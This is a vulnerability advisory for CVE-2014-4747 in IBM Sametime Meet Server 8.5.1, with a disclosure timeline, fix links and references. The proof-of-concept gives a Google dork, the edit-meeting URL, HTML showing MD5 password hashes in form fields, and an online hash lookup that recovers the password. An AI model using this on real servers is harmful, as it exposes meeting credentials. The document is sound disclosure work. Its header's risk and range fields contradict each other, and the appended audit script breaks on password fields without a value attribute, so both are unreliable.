IBM Sametime Meet Server 8.5 Password Disclosure

2014.08.12
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID: http://osvdb.org/109443
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 / Internet Explorer 10 / Google Chrome Version 33.0.1750.146 m

Table of Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography

[0x00] The Vulnerability

Password Disclosure

Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.

[0x01] Exploit Description

On the page that allows editing a meeting, the MD5 hash of the meeting password can be retrieved simply by reading the HTML source code of the page: the server writes the stored hash into the value attribute of both password fields of the edit form.

[0x02] PoC - Proof of Concept

To exploit this vulnerability you only need to look at the page source.

http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536

[...]
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
[...]

Because the value is an unsalted MD5 digest, a weak meeting password can be recovered from the leaked hash with a public lookup service:

http://www.md5online.org
E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA

[0x03] Correction or Workaround

Apply the procedures described in the following link:

http://www-01.ibm.com/support/docview.wss?uid=swg21679454

[0x04] Timeline

18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reported to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published

[0x05] Published

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
http://www.securityfocus.com/bid/68823

[0x06] References

Information Leakage
https://www.owasp.org/index.php/Information_Leakage

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html

[0x07] Bibliography

http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent

[end]
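The leak above is a pre-filled password field, which is easy to check for when verifying the fix on your own Sametime server or auditing any form that round-trips stored secrets. The following audit helper is an added example and not part of the original advisory; the two HTML fragments are constructed from the form shown above (the fixed variant simply leaves the value attribute empty, which is an assumption about the corrected form, not something the advisory shows).

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the fragment in the advisory (not a live response).
VULNERABLE_HTML = """
<form>
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
</form>
"""

# Constructed: how the same form looks once the server stops echoing the stored hash.
FIXED_HTML = """
<form>
<input type="password" value="" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
</form>
"""

# 32 hex digits, optionally wrapped in parentheses as Sametime renders it.
MD5_HEX = re.compile(r"^\(?([0-9A-Fa-f]{32})\)?$")


class PasswordFieldAuditor(HTMLParser):
    """Collects <input type="password"> elements whose value was pre-filled by the server."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() != "password" or not a.get("value").strip():
            return
        m = MD5_HEX.match(a["value"].strip())
        self.findings.append({
            "name": a.get("name", ""),
            "looks_like_md5": m is not None,
            "digest": m.group(1).lower() if m else None,
        })


def audit_password_fields(html):
    """Return one finding per password field that carries a server-supplied value (CWE-200)."""
    parser = PasswordFieldAuditor()
    parser.feed(html)
    return parser.findings
```

Run it against the page source of an edit-meeting form fetched from your own server; an empty result means the hash is no longer echoed.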

References:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
http://www.securityfocus.com/bid/68823

